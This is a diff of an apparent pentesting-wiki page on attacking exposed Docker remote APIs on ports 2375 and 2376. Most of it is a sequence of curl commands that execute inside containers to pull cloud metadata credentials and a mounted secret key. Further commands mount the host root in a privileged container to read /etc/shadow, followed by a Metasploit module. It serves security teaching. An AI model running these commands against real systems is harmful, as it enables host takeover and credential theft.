GitBook: [master] 2 pages modified

SUMMARY.md

@@ -262,7 +262,7 @@
 * [1883 - Pentesting MQTT \(Mosquitto\)](pentesting/1883-pentesting-mqtt-mosquitto.md)
 * [2049 - Pentesting NFS Service](pentesting/nfs-service-pentesting.md)
 * [2301,2381 - Pentesting Compaq/HP Insight Manager](pentesting/pentesting-compaq-hp-insight-manager.md)
-* [2375 Pentesting Docker](pentesting/2375-pentesting-docker.md)
+* [2375, 2376 Pentesting Docker](pentesting/2375-pentesting-docker.md)
 * [3260 - Pentesting ISCSI](pentesting/3260-pentesting-iscsi.md)
 * [3299 - Pentesting SAPRouter](pentesting/3299-pentesting-saprouter.md)
 * [3306 - Pentesting Mysql](pentesting/pentesting-mysql.md)

pentesting/2375-pentesting-docker.md

@@ -1,4 +1,4 @@
-# 2375 Pentesting Docker
+# 2375, 2376 Pentesting Docker
 
 ## Docker Basics
 
@@ -79,9 +79,7 @@ podman ls
 ```
 {% endhint %}
 
-## 2375 - Pentesting Docker API
-
-### Basic Information
+## Basic Information
 
 Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a privileged docker container. By using the Remote API one can attach hosts / \(root directory\) to the container and read/write files of the host’s environment.
 
@@ -92,14 +90,63 @@ PORT    STATE SERVICE
 2375/tcp open  docker
 ```
 
-### Enumeration
+## Enumeration
+
+### Manual
+
+Note that in order to enumerate the docker API you can use the `docker` command or `curl` like in the following example:
+
+```bash
+curl -s http://open.docker.socket:2375/version | jq #Get version
+docker -H  open.docker.socket:2375 version #Get version
+```
+
+If you can **contact the remote docker API with the `docker` command** you can **execute** any of the **docker** [**commands previously** commented](2375-pentesting-docker.md#basic-commands) to interest with the service.
+
+#### Curl
+
+Sometimes you’ll see **2376** up for the **TLS** endpoint. I haven’t been able to connect to it with the docker client but you can with curl no problem to hit the docker API.
+
+```bash
+#List containers
+curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq
+#List processes inside a container
+curl –insecure https://tlsopen.docker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq
+#Set up and exec job to hit the metadata URL
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'
+#Get the output
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'
+# list secrets (no secrets/swarm not set up)
+curl -s –insecure https://tlsopen.docker.socket:2376/secrets | jq
+#Check what is mounted
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'
+#Get the output by starting the exec
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'
+#Cat the mounted secret
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'
+#List service (If you have secrets, it’s also worth checking out services in case they are adding secrets via environment variables)
+curl -s –insecure https://tls-opendocker.socket:2376/services | jq
+#Creating a container that has mounted the host file system and read /etc/shadow
+curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
+curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test
+curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'
+curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'
+#Stop the container
+curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop
+#Delete stopped containers
+curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
+```
+
+If you want more information about this, more information is available where I copied the commands from: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
+
+### Automatic
 
 ```bash
 msf> use exploit/linux/http/docker_daemon_tcp
 nmap -sV --script "docker-*" -p <PORT> <IP>
 ```
 
-### Compromising
+## Compromising
 
 In the following page you can find a way to **scape from a docker container**: